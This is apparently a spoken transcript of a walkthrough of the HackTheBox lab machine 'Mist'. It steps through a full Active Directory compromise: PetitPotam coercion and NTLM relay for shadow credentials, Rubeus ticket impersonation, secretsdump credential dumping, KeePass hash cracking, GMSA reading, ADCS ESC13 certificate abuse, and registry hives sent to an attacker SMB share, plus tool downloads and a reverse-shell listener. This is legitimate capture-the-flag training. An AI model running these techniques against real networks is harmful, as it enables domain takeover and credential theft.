We'll get that first. So we'll do PetitPotam. Let's see, GitHub. This should be fine. Git clone. We can go in here. And there is an executable. I had a lot of trouble getting this to work. Like I had the relay working on the box, but for some reason it never like was the system user. So it didn't get permission. So I couldn't do the shadow credential part. If you could get this executable working as the Python one is, then you'd be able to skip the whole like getting Brandon's NTLM hash, because the whole reason we want to get Brandon's NTLM hash is so we can use PetitPotam to coerce this machine authentication. So we're going to try this first, and it's going to fail. So we're going to do proxy chains, Python 3, PetitPotam.py-u, Brandon.Keywarp -d MIST.HTB -hashes. And we put his hash here. We probably have it on the net exec command, right? Let's do nxc. We can grab his hash, paste that. And then after hashes, I think that's it. Oh no, we have to put the SPN. So we'll do MSO1, then specify the port that we are listening localhost there that directs us to 80 on our box. And we'll say, this piece doesn't matter. You can put anything you want here. So the key thing is PetitPotam is going to reach MSO1 on port 5050, and that gets directed to our NTLM relay, which goes to the domain controller. And we need the target. So we'll do 192.168.100.101. And I forgot, we'll do pipe all. So it attempts to do every type of attack. Login failure. That is not good. Let's see. Did I copy that wrong? I wonder that hash is going to have to be lowercase. Let's run this again. Make sure we're still authenticated. It's thinking. Okay, that hash does work. Paste. Logon failure. Let's see. Oh, I don't have a period. Okay. So we have it working. It says things, but we never see anything on this. And that's because the web client is not started on the box, so it can't make a webdav request. So we're going to download a program called ETW Start Web Client. I think it is. Let's see. Yes, this is it. And for some reason, you can't start the web client through the SC thing, like the services console because of just weird privileges with services. But if you go to this post, there's a lot of service triggers that enable us to start the web client so we can then make a WebDAV request. So we're going to download this. So let's just do a we have to go probably enter a www directory, wget, then MCS, I think will compile. We have to add the unsafe. There we go. So now we have this ETS web client. And if you don't have this, you can probably search ipsec.rocks for like install mono to get the ability to compile .NET things on your Linux box. But we have to now download this tool to the box. So we'll I'm going to send this actually to the relay pane. Okay. So let's do pwd. Where am I? Let's go into exam htdocs files. That's where we're storing things. Curl http 10.10.14.8 8000 that -o that. Then we execute it, and it says web client service started correctly. So we're going to do this PetitPotam request yet again. We have to get into the directory first. We're going to do this request yet again. And this time, we hopefully get a connection because the WebDAV client is started. And then we have an interactive shell right here. And if it doesn't work, you have to run this ETW start web client every time because after it makes the request, the service stops. So it's a little bit annoying in that sense, but it is what it is. And this next step we're going to have to do relatively quickly because I think there's an automated task just like fixing the shadow credentials. So if we like start doing it, the shadow credential resets what we're about to do, and then we have to do it again because the certificate changed. So let's do nc localhost 127.0.0.1 port this. I don't know why I did localhost and 127.0.0.1, but we started the interactive shell with this NTLM relay, so this is how we interact with it. So this is a ldap shell. And because we're using that custom version of Impacket, we have the clear shadow creds command. So we can run, what's the other one? Let's do this quickly. We got clear shadow creds and probably create or something. Let's search for shadow, set shadow creds. So we'll do clear shadow creds, MS01 $. We cleared them successfully. Then we're going to set shadow creds, MS01 $. Okay. So let's see. Uh-oh. Module OpenSSL crypto has no attribute PKCS12. So it failed adding the credential because of a Python library. That is not good. Let's see. PyOpenSSL remove. Okay. Let's see. I guess we should run these commands. This is annoying. Pip uninstall. Sure. Hopefully I already have that library installed. Okay. Let's see. Couldn't get that MITM proxy. Let's see if it works now. We changed a PyOpenSSL version. We'll have to exit the shell. Okay. We started this up. And that's not good. Please start. Thank God. Run this. The client should be running. Yep. Okay, so we have that shell. And let's do I'm going to do rl wrap nc localhost 11000. And I'm really hoping this works. So clear and set. So MS01 set. Awesome. So that did fix it. So we have the CS12 cert here. This is the password. So we got to get this over to Rubeus. So I'm going to go in PetitPotam. We're going to move. What is this cert? RC. Oh, what is that? Find.grep RCNA. We're probably going to be too slow. Move Impacket RCNA to dub. Okay, now we can curl. Let's actually rename this. So mv dub RCNA. I'm going to call this ms01.pfx. HTTP 10.10.14.8 8000 ms01.pfx -o ms01.pfx. Okay. So now we should have Rubeus still here. So ask TGT user ms01 $certificate. This is a colon ms01.pfx /password. And then we're going to give it this password here. And this is the same command we did with Brandon, except we have a password. So we'll do get credentials, show, no wrap. Fail to find certificate. That is correct. ms01.pfx. Oh, I turned my web server down. Oh, no, I didn't. Right here. Where are you running? ls grep ms01. Where did I just copy it to? Copy it to my working directory. I will be surprised if we win the race to get the Rubeus command. But it's good if it fails, because then you'll know the error message that it gives you, right? So it's taking a little bit of a long time. So I think we actually did everything within the window, and we will get a NTLM hash of this account back. Yep, we did. So we have NTLM of MS01. So do we have like a notes? I do. We'll call this MS01 $this domain. There we go. So what I'm going to do real quick is pause the video for, let's do 5 minutes. And then I'm going to run this command again, because we should see the error message. It's going to be some weird like Kerberos something not found or something if the shadow credentials doesn't work. Actually, we could probably just clear them. And then I'm going to set again. So this certificate that I have is invalid. So if someone is fighting over it or the automation screws over, this is the error message you'd get. KDC error client name mismatch. So if you see that error, make sure, just do it again and make sure you're a little bit faster, I guess. I don't know what else to say, but yeah. So now that we have the NTLM hash, do I have that on my clipboard? I do not. Let's go ahead and grab that. So cat notes, we can grab this. I'm going to use another Rubeus command, and we're going to impersonate the administrator user. So let's do /rubeus.exe, ask TGT, no wrap. User is MS01 $, And this may have to be in quotes because of that $sign. I'm not sure. And we give it the NTLM hash as RC4. And we have a certificate here. So what we're going to do is copy this ticket. And then we're going to run another Rubeus command. So we'll do rubeus.exe s4u, then self, no wrap. We're going to impersonate user administrator. And then we're going to do alt service, then specify CIFS, which is the like SMB file service, ms01.mist.htb /ticket : and paste in what we copied. And now we get another ticket back, and this is in Kirby format. And to use it with our tools, we want to convert it to a CC cache. So let's do that. So this is going to be vms01.kirby. We can paste that. It's probably base64, right? Let's see. What's that say? Base64 ticket Kirby. So I don't know if I base64-D or not. Let's just try running ticket converter. So we'll do ticket converter.py, specify ms01.kirby, ms01.cc cache, see if it errors. Unknown file format. Okay. So base64, let's move this to .b64, base64-D, this to ms01.kirby. There we go. Run ticket converter again. And now we have converted the Kirby to a CC cache that this will now enable us to use. So let's go and what do we want to do? We'll do export Kirby 5cc name is equal to, what do we call it? ms01.cc cache. We probably should have named this like administrator.cc cache, but oh well. So now we can proxy chains. We'll do secretsdump. Do I have secretsdump? Secretsdump.py, I do. And then what are the arguments I need? -k, no pass, administrator at ms01 MIST.HTB. Is this going to work? I may need other. Nope, there we go. It's working. So because we can access CIFS, we can use secretsdump. And even though this box isn't a domain controller, secretsdump will download the SAM and system hash or database and dump that. So now we have the local administrator password to this box. So let's go and do vnotes and say local ms01 administrator this. I'll call this ms01 instead of local. There we go. So we're now just waiting for all the things to dump. And we'll connect to the box as administrator and see what files are there. And now that it's done, we also get another user, the SVC web. That password is the most savage password ever, 123. So I'm going to add this also to the notes. So we can do vnotes, and then we can say ms01. This is SVC web, and then this. And we never actually needed the local administrator password, again, because the Kerberos certificate we have does enable us to do whatever we want, right? So if I wanted to, we could do WMI exec as well. And then if we do whoami/all, it's going to say we are the administrator user from MIST.HTB, right? MIST/administrator. So the NTLM hash just makes it a little bit easier if we want to use password hashes going forward. But we can always just keep using that Kerberos certificate. The one thing I do want to go over to is Impacket, right? So if we do, let's change this to SMB. We can change this to administrator. And then I'm going to test that hash. So let's cat the notes again. We can grab this hash. Attempt to log in. We don't want LDAP checker anymore. There we go. And we'll see if this has a successful authentication. It does not. And you may be thinking, wait, we just dumped that. That is correct. But keep in mind, it's the local account. Let's see, local-auth is what we specify. So what I was testing here is if the local administrator password was the same as the domain administrator, then we'd just be able to log in. We have to specify 101 because that's MS01. So we do this, and yes, it does work. But since the domain administrator password is not the same, this doesn't work. We can also try cracking this. We could also go into the notes and try that most savage password ever, just in case they did like password reuse, right? That's always a thing. So we can do -p. I think that's still on local auth, so we have to remove that. So no password reuse there. We can check it against the domain administrator and nothing, right? At least I'm assuming it's nothing. I have not actually tested this. This would be a funny unintended that went a very long time, but yes, nothing. So let's go back to where we were. So we can do WMI exec. We can't do PS exec mainly because of Windows Defender. If we try doing it, it's going to look like it starts working. And then when it starts the service, this is when Defender kills it and it just hangs. So WMI exec's a little bit slow. I'm just going to do SMB client.py. And let's see, shares. Let's do $UC. And now we can look at the file system. And this is just faster than WMI exec, so that's why I'm using it. So we can look at administrator, desktop, maybe like that. There we go. User.txt is there. Can look at documents. Nothing's there. If we do a ls, we have other users. So like Sharon Millard, that's a new user. So if we do an ls on that user, desktop, we have to specify /*. There we go. Let's go to documents and we get a Keypass database. So let's go ahead and download that. So I'm going to do get this Sharon.KDBX. And that should download. I don't know what directory I'm in though. Find.grep.kdb. Okay, I'm right there. So key passes are always going to be encrypted. So we have to get a password. Looking at other things on the user before we just try a blind brute force. We have cats.png in that image. So let's go ahead and get both of those. And then we'll see what they are. And maybe we can make a word list based upon them. So we'll do a get on this as well. Okay. So let's open cats.png. And it's what I expect, a bunch of cats. So let's try the other one, open on image 200. And we have some CyberChef output. And they're Googling best encryption algorithm. And looking at CyberChef, we have UA7CPA, then bracket pound 1 exclamation point underscore that ZX, which kind of looks like a password. And 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14. There's 14 characters there. We say 15 here, so there's one character hiding behind this. So I'm going to guess this is the Keypass password, but we have to get one last character there. We can just try opening Keypass with this password and it'll probably fail. So let's go copy that real quick. UA7 CPA. Download that. Okay. ZX. So this is probably the partial password. We'll just put it there. Do I have KP-CLI? I do. Can we try opening this? Sharon KDBX. Help. It's been so long since I used this. ls email ls enter net. Let's see. Clone, edit, find. Let's see. I may pause the video and look how to dump everything with Keypass. But it may also not show us anything because we don't have the password. Do we have -h, PW files, read only hist, key file must exist. Let's see. KP-CLI with password. Or I can just install Keypass too. Let's see. Installation. Okay, I'm going to pause the video real quick and look at my notes for this Keypass stuff. Okay, looking at my notes, the thing I was missing is you specify the database with --KDB. So if we had done that, then ask for the password. I did notice one other mistake that would have been hell later on. And if we look at this, the password is !1! We missed the 1. So let's fix that real quick before we go over to Hashcat. So in order to crack this, we're going to run a tool called Keypass to John. That's what it is on Sharon. And this gets us a nice hash. We can go over to Hashcat and v hashes. We'll call it MIST.HTB. Paste this in. And then we're going to attempt to crack this. So we're going to do hashcat-A3 for attack mode 3. Specify the hash. So hashes MIST.HTB. And then the password, or the partial password, I should say. So cat partial. We can grab this. And then I'm going to do $A, which is going to put all possible characters in this field. So if we do enter, no hash matches the structure. Cat hashes, missed Keypass. I could have swore that was, let's see. Hashcat, crack, Keypass. I wonder if it's a mode that is not there yet, or not in the version of Hashcat I'm running. It could be relatively new. Let's do Hashcat example hashes. There we go. This is good. Let's see, Keypass. Keypass. There we go. So it looks like it is mode 13400. So I wonder if we don't have this mode. Mode 13400. Salt length. Let's just double check what this looks like. V hashes missed Keypass. Oh, it's put the username first. So we got user : So we can just do --user. And then it's going to ignore that first field. And there we go. It started to crack. It'll probably take 15, 20 seconds to initialize all these runtimes, but the crack itself should not go long. We could have probably wrote our own Python script to do it because we're only doing one character, right? But we have cracked 1 out of 1, so it succeeded. We can do --o. We also have to specify user. And the last character is an @ sign. I would have guessed bang because that's normally the last character of a password, but we got the last character as @. So we can partial, we can put that in and then move partial to Keypass password. It's a horrible file name. I should put that in my notes, but I'm lazy. So now let's do kpcli, put in this master password, and there we go. So we can go into Sharon. Then we got the operative account. So if I do, I think, show 0. Okay. Show -f. Is that going to give me password? Yes, it is. So we can get the password for Sharon. And it's her operative account. So I'm guessing that's the operator account. So let's copy that password. We can go back here and let's go actually into Bloodhound. Search for Sharon. We got Sharon Mollard and OP_Sharon Mollard. So I'm guessing the operator account is OP. So we can do user OP_Sharon.Mollard like that. And the password, I feel so bad for her because I'm so tired of this job. There we go. Run this and we'll see if we get a success. We do. So success from Sharon. So let's see, or let's mark her as owned. And then see what we can do from this account. So if I go to inbound control, this is what people can do to it. Let's go to outbound. So Sharon, let's see, is a member of operatives, which can read the GMSA password of this account, the SVCCA. So Impacket does do GMSA. I'm trying to think of what that syntax is off the top of my head. I think it's just --GMSA or -M GMSA. It may be ldap. Let's try ldap. We have to specify 100. Let's see. GMSA. Invalid choice. Let's see. NXE read GMSA. NetExec wiki. The documentation's relatively good. Just --. So I was right the first time. It's not a module. So we do ldap, specify GMSA, and this will let us read the password to the service account. And I think if we even went back to the notes, clean up, patch monocular, set up laps. So since she's setting up laps, chances are that's why we can read this account. So v notes, let's go up one. Let's do domain, SVCCA $. That. Okay. So let's go back into Bloodhound, and we can mark the SVCCA user as owned now because we read that group managed service account password. And then let's go and see the outbound control to see what we've gained access to. So member of domain computers, we can kind of ignore that. It's a member of certificate services, which unlocks manager authentication, and also this CA backup user. And we can gain access to that through the add credential link, which is what we've been doing before, like that whole ldap thing, like adding a certificate backup login to the account so we can log in as it. So we can impersonate the backup user. It's not exactly clear why right off the bat, but the reason why we're going to do this, I guess we can explain it now before we go too deep, is this CA account. If we look at the user account control, that's 4096. And if we go, let's see, Windows user account control bitmask. So if we look at this, I think it's the property flag. This one, is it going to say? Yes, it is. So let's go Python 3, hex of the number. It is 1000. So that privilege is Workstation Trust Account. And typically, Workstation Trust Account doesn't have remote access privilege. So later on, when we use PyWhisker, we'd get a denied here because we're doing a remote logon, and the GMSA account is meant for local login only because it's treated as a workstation. So that's why we're going to move over to the SVC CA backup user, because if we look at its account control, it's this weird 6000 number, right? But if we just go to hex, it is 10,200. So let's go back to that Microsoft thing. 200 is going to be normal account. And then the 10,000 is going to be don't expire password. So the CA service backup, this is just a normal account. So we can do a remote logon, and that will enable us to use PyWhisker and perform the next attacks from this. So that's why we're going to be using CA backup. I think PyWhisker we can use from this service account. We just won't be able to do the 80CS13. So it's Certify we can't use. The Workstation Trust account is really odd permissions, but that's what we're going to be doing. So I'm going to mark this guy as owned as well. And then we're going to see what this manager authentication can do. If we click around here, there's no outbound control. But if we go to Cypher queries, go to browse, we can look at all the queries they have. The new Bloodhound is a bunch of certificate ones, so we can see like all the enrollment rights, which is just going to be a giant mess. But we can do the OID group link. That's what's going to enable us to impersonate. And this draws a decent picture. So we can become the manager authentication. And there's kind of links over to this backup service authentication, which is backup policy to a service account. And if we look at who a member of service account is, it's going to be backup operators. So if we can get to backup operators, we can create remote backups of the computer, back up the registry, grab the NTLM hash of the local admin. So if I go to pathfinding, let's do the SVC, what is it? SVC CA backup user. And let's make a path to backup operators. And this is going to make it very clear. So because we're a member of certificate services, we can do ADCS ESC 13 to become a member of certificate managers, which is a member of CA backup. And we can do that ADCS ES 13 again on service accounts to become a member of backup operator. I think I said backup operator twice when this is CA backup, but we have to do quite a few certificate attacks. So the first thing is we got to become this user. So let's go back to our box, and we're going to use PyWhisker to add a credential link to service backup. So let's go and Google PyWhisker GitHub. And I'm going to get a slightly older version because during like a recent commit, like things got screwed up. Like trying to install through pipx makes this just not work well. So I'm going to go to this request. What is the commit hash? This one. Okay. So let's download this. So git clone, PyWhisker. We go in there, git checkout. Hopefully it's my other clipboard. Nope. Let's go copy it again. Commit, copy, paste. There we go. And I'm going to create a Python environment. So we'll do python 3-m VM.vm. source VM bin activate. Okay. So it can do pip3 install -r requirements.txt. It's not a module. So when they're doing the pipx thing, they're trying to make it a module, and it just has a few issues. There's like a variable that needs to be a global variable or something odd. So it's just easiest to go to a commit before the pipx thing. But this is going to let us run PyWhisker. So we can do Python 3, PyWhisker. Let's proxy chains it. And then what we want to do is specify the domain, which is MIST.HTB, the DC IP 192.168.100.100, our account, which is currently the SVC CA, the hash of this account, which, let's see, we can exit that, cat cd dot cat notes, grab this. Okay. And then the next thing we need is the target. So we'll do -- target SVC CA backup. So this is the one we're adding the credential link to. Do add. And let's see. Okay. We have updated the MS key credential link and got a PFX. So what we're going to do with this is get the hash. So let's see. We can probably do that through Rubeus, how we have been. So I'm going to move this to www. We'll call this. And we've done Rubeus a few times. It's saying a TGT can now be obtained through PK init tools. So I'm going to show it a different way. We're going to just download PK init tools and do it this way. So git clone. So in case you did not want to run Rubeus and you wanted to go from these certificates and do the pass the ticket to get the NTLM, that's what I believe we're going to be doing now. So let's see. We're in PK init tools. Is there a install? Let's do pip3 install -r requirements. And then we're going to copy this cert. Where is that? Do we have it? Where is it? We were in PyWhisker. Okay. Let's move that to be up one directory and we'll call it svc ca backup.pfx. Okay. So let's do Python 3. Then get tgt. We want to proxy chains this. Cert pfx. And we'll do .. Copy this. Then the next thing we need to do is specify the PFX password, which is going to be this. Okay. Then MIST.HTB service CA backup. And then the next thing we need to do is specify the cache file we want to create. So we can do svc ca backup.ccache. Then DC IP 192.168.100.100-V. Oh, libcrypto. Come on. That's how you would do it if your Python libraries are not awful. Let's just Google this error. The tool is pk init tools. Issue 21. Hopefully this is it. Proxy chains? No. Let's see, we can try to download this. The requirements.txt. That's not even in there. Maybe it didn't install. Let's just uninstall it, then install it. So do uninstall, and then pip3 install -r requirements.txt. Then we can run this again. And there we go. It seems to be working. Awesome. So if you have the issue, I guess go back in the video and do what I did to that requirements, uninstall OS Crypto, and then reinstall it. So now we have this hash, the mini Kerberos. So what we can do is the get NT hash. So if we export KRB5cc name is equal to svc.ca backup.cc cache. It's where we save that to. Then we can do a Python 3 get NT hash proxy chains, and we specify the domain, so MIST.HTB svc.ca backup the user, and the key is going to be that piece. And there we go. We have the NT hash of svc.ca backup. So if we go back here, let's go back to our netexec command and just try this out. svc.ca backup, the hash, that, get rid of GMSA, and hopefully this works. It's connecting. Yep, we do. So go to notes, domain, svc.ca backup. Okay. Sweet. So figure out what pane I was on. Now we can do the Certify stuff. So let's go and do we already have Certify installed? ls grep cert. We do not. I'm just going to clone the latest version because ESE 13 is relatively new. So we can do Certify GitHub, and we'll download and install this. So pip3 install, git clone, this, cd, Certify, and then we can do pip3 install period. And this will start installing Certify. So we have to switch users a few times, right? What was it? So we're here. We need to do ADCS 13 to certificate managers. So we can start the request. So proxy chains. So let's just make sure we have, how do we run Certify? There we go. So proxy chains, Certify. Then we can do a request, svc.ca backup at MIST.HTB hashes. We want to go ahead and grab this again. Grab this. Paste that. Okay. Then DC IP 192.168.100.100 DNS 192.168.100.100. The CA is MIST DC01 CA, and the target is going to be the DC. So DC01 MIST.HTB. The template is, I don't think that's the name of the template. Let's see. Go to Cipher Query. Does this give the names? I think this is the name, Manager Authentication. If not, then we're going to have to run the find vulnerable because that'll say. But manager authentication, and then we specify key size. If we don't specify key size, let's see the error. I know we had to specify key size 4096. So this will take probably 30 seconds to run if we did all the things correctly. So the public key does not meet the minimum size. So let's do dash key size 4096. And that should match it. Requesting. So this will give us a certificate as long as we can connect. Let's see. Proxy chains failed. It's dash target for this, I think. See, I wonder if there's a debug. Is that the debug of Rubeus, right? Trying to resolve. Okay, that's good. Save the certificate. Is it really the casing that matters? Just testing this out. Saved. Okay, so maybe it was just like a weird networking glitch. But we have saved the PFX file. So now we are the manager authentication, and we want to now become the backup authentication. Because if we do the pathfinding, we are here. We want to now do the ADCS ESE 13 to become a service account. So let's now switch our certificate to use this PFX file. So we're going to use Certify auth PFX, the service account, then DC IP 192.168.100.100. Let's do proxy chains, and we want to output the certificate in Kirby format, and then we're going to convert it over into CC cache. So we can just do Python 3 ticket. Is it just ticket converter? There we go. SVC Kirby to SVC CA backup CC cache. Okay. Export KRB5 CC name is equal to this cache file. So now when we run Certify again, it's going to be using our new certificate. So we're pretty much running the same command we did before, right? We do the Certify. The user is going to be the CA backup. We don't want to log in with NTLM Hash because we have a modified certificate. So we specify Kerberos, give it the no password flag. DCIP, DNS is fine. The CA stays the same. The target stays the same. The template is going to be the backup service account. So backup service, what is it? Authentication, I think it was, not account. Cipher, backup service, authentication. Like that. We'll leave the debug on because when we didn't have debug, it like gave us networking errors. Okay, this looks good. So now we have a key again as this service CA backup. So what we want to do is switch to this. So let's, what was the first command we did? We did the Kirby, right? Okay. Then we can do the CC cache. Okay. So now this ticket that we have should be, what is it? The backup service authentication, which is a member of the service accounts. which can back up the server. So let's try this. I'm going to do proxy chains, reg.py, which is just the Impacket thing. We'll do -k, no pass, MIST.HTB, svc ca backup at DC01, MIST.HTB. We'll back up the register keys to 10.10.14.8 share. And we have to start a Impacket server. So cd share, do we already have that? We don't. mkdir share. Then sudo SMB server.py. Does this exist? SMB server, Impacket, SMB server, awesome. SMB to support. And then what is it? The share name and the location. 445 is already in use. That will be the relay. Right. Let's see. This one, this window. There we go. Okay. Start this. And I really hope we did everything right. It looks like we did. Awesome. Server cannot respond. We did something wrong with this. Our Impacket may be wrong. Let's see, -h, share name, share path. That is right. SMB2 support. Let's see, let's just go into, do we have a VM with Impacket? Sudo su. Source VM bin activate. I wonder, maybe it can't like do anonymous. I don't know. That should be fine. SMB server.py. Okay, we have SMB server.py now. This will be a newer version of Impacket. SMB server.py, SMB2 support, share, PWD. Let's run this again. That's looking better. So it looks like the SMB server, like our Impacket version, just wasn't up to date enough to save this. So we're getting the SAM hive, and then after this is going to be system. So while that goes, let's just again talk about what we did. So we started out as this user, and then we ran the Certify command that put us as a certificate manager. We re-imported the certificate after we authenticated, and then that let us do the ESC13 account to service accounts. So now we are, what's this one? Do we have all that syntax? What was it? Let's see, template, backup service, authentication. I want to say it was this. So once we're certificate managers, we did another attack to become a CA backup, which then enabled us to be service accounts. And that let us impersonate the SVC CA backup user. Or didn't let us impersonate, let us be in this group. Like our certificate says we're in that group. So still waiting on all these files to download. They are relatively big. If we go to cd share du-hs, It's at 5 megs now. So I'm going to pause the video and we'll resume when it's done. So it's finished a few times, but every time it is just timing out when trying to copy the system registry flag. So if I do a du-hs, we can see it's 18 megs. And if I try to do a secretsdump on it, so we'll do secretsdump local, sam save, system save. Oh, it looks like it actually worked. So we can get the administrator hash. So I guess you may just have to try it a few times, and occasionally you'll copy enough where it does work. A few times I tried it and it just did not. So let's see if this actually will authenticate us. So we'll do -u administrator and then put this password in as the hash. And this should get us as pwned there, but it doesn't. I wonder if we just viewed the wrong data. 5E. Is that what I put? 5E1221. That is. Cat notes. It's definitely a different hash. We'll add the local user flag to this, or maybe SMB. We should be able to pass the hash on ldap. Local user. Let's see, what was the local flag? Local auth. So I wonder if because it did not complete successfully, that maybe we got like a bad decryption key and the hash is wrong? Because that is really bizarre. So what I'm actually going to try to do is see if we can find a place we can write. So if we look at this, let's see. We do -- shares. We have to change this to SMB. And if we can write to a place on Active Directory, such as the sysvol, then we should be able to write to the sysvol, evil WinRM to the box, copy it to the web directory, and download it over HTTP, and avoid like copying over proxy chains, because I think that's where the issue's coming from. So let's do SMB client.py -hashes. We can specify that. SVCCA backup at 192.168.100.100. This will let us log in. And I just want to see what the sysvol looks like to see if we can find a directory to write to. So shares, use sysvol, maybe a net logon as well. That's also readable by everyone. ls, MIST.HTB. Let's write to scripts. Let's see if we can write here. Because I bet if we went here and we tried to write to like MS01 at $, this is definitely not going to work. Right? Yeah, access denied. So I think we may be able to write to MIST.HTB sysvol, then MIST.HTB. Oh, no, we want to add scripts. I may want a trailing slash. But it looks like it is writing, and it wrote that wickedly fast. Oh, man. So I think this is actually going to work. Sweet. So if I do a dir or ls, We have all the files. We could probably do like an SMB get on these files, but let's complete the logic and download them over HTTP, like imagining we couldn't do proxy change or something, right? So if I cat notes, we have the local administrator hash, so we can definitely use, no, we can't use that. Because local administrator is not going to have permission over sysvol. We need OP Sharon's password. That was the KPCLI thing. Was it time? Yes, this is it. So let's see if this user has remote access. Okay, evil winrm -I 192.168.100.101 -u op Sharon Millard. Put that in. And if we also had that reverse shell as, is it Brandon.Keywarp? That would also work, right? But this hopefully does. We did proxy chains one. Yep. Why are you not establishing? Does this not have remote access? I thought this was in the WinRM group. Bloodhound, search, OP, Sharon, outbound, member of, maybe not. Execution privilege, PS remote. Oh, I can PS remote to DC01? That was unexpected. Okay, I can. Well, I don't want to be on the DC because that's not running a web server. Does Brandon have remote capabilities? Let's see. Nope. Sharon. Okay, we got to get a shell as Brandon. Who am I? That shell's probably dead by now. Yep. There's the chisel tunnels. Kraken. Okay. So let's do this again. And then we can hit this. This should get us the shell. So now we're local user on this box. If I do a who am I? Yes. So we want to edit the link. So we'll cat lnk. And this is going to get us a shell as Brandon.Keywarp. So rl wrap nc lvnp 9001. So once we're Brandon.Keywarp, we'll be a member of the domain on this box. And members of the domain have access to the sysvol. So I should be able to download the registry copies to this box and then copy them to the www directory. And they'll be able to get all the hashes this way. So this definitely should work. So I'm going to pause the video because this can take like a minute or two for this shell to come back. So we'll pause it and then come back when we are Brandon. Okay, we have a connection back. So let's go to examp, then htdocs. And this is where all the files are. So we can do a, I think it's copy in Windows and CP in Linux. So we'll do copy MIST.HTB, sysvol, MIST.HTB, scripts, star. Is this going to work? We have all the save files. This is looking good. So let's go and download them. So we can go 10, 10, 11, 17, sam.save. Let's save this and we're going to make a new directory and call this regdump. We can save that. Then we can just save system. Then we can save, what's the last one? Security. Okay. So if we go in regdump, we have all the files. So I just want to do MD5 sum against these and MD5 sum against the ones in, it was share, right? Yeah. So the system, DA, so that's different. 32. The SAM is also different, oddly enough. Let's see. They're the same size. So I guess for some reason it just never copied the security save. I bet if we just reran that, it would copy the security save and then we'd be golden, but okay. That's weird. But if you're having issues and not getting the full 17 or 18 megs of the system hive, at least you know a way around that. I think there's a step I'm forgetting on this box. We did not specify local. Okay, now with the security hive, we have more data. This is the same hash we were trying, right? So this just must be an old administrator password because it's probably in the ntds.dit database now. So it's like long gone out of the local SAM is my only guess right now. Let's see right here. No. There we go. Yeah, this is definitely the same hash. Maybe not. Was that the same? I can't tell. I think it was 5C before. But still does not work. But what we do have is the machine account. So we should be able to use secretsdump with this. And then actually get like the ntds.dit database. So let's do secretsdump hashes that. Then we can just specify, what is it? DC01.MIST.HTB. Is that going to work? Let's see. No route to host. Proxy chains. We're going to specify a user probably. DC01 like that. Special character. There we go. So now we have the administrator. Where is it? Right here. And this is the latest hash. So if we do this one, this better work. There we go. So pwned. So now we can just do, let's do WMI exec. Then we can say hashes this administrator at 192.168.100.100 proxy chains. And there we go. So we can do cd /users administrator desktop. And I think this is where the flag is going to be. Yep, root.txt. So I do want to do one last thing. So if we do secretsdump, there is two flags. So I like doing the password last set, user status, and history. So I'm going to dump everything. We should be able to do this with the same hash we had. Yep. So administrator. Let's see. Do we have his password history? We may not. Maybe the password policy isn't set. Nope. We don't get password history. Okay. I was going to see if we could see if the hash we had out of the SAM database was old, but it doesn't look like we can tell. Or maybe, one second. We can get rid of those flags real quick. This will just give us less output to look at. But administrator, password last set 2024-02-24. Okay. And we can go to the local pwd last set. Does this tell us? It does not. I guess the password set date is not stored in the SAM. But I'm guessing out of the registry, the password is outdated. It's moved to ntds.dit, and we have the more up-to-date password. But that is going to be the box. Hope you guys enjoyed it. Take care, and I will see you all next time.